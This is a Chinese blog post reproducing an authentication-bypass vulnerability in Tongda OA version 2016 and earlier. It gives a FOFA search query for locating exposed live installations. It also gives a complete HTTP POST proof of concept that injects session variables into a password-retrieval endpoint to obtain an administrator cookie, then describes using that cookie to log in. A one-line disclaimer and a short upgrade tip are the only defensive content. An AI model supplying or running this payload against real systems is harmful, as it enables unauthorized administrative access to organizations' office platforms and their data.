本文主要是介绍通达OA 身份认证绕过漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
前言
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
一、产品简介
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
二、漏洞描述
该平台存在身份认证绕过漏洞,攻击者通过构造特定的数据包,获取登录cookie,利用cookie进行未授权访问。
三、影响范围
OA版本<=2016
四、复现环境
FOFA:title="office Anywhere" && icon_hash="-759108386" && "2016"
五、漏洞复现
1.访问存在漏洞的网站,抓包
2.POC
POST /module/retrieve_pwd/header.inc.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1024_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,
3.在浏览器修改Cookie,访问http://ip:port/general/,登录成功
六、修复建议
增加新的校验方式,升级到2017以上的版本
参考链接
https://mp.weixin.qq.com/s/LIRljOkXrFD4_HqTfNsnZw
这篇关于通达OA 身份认证绕过漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!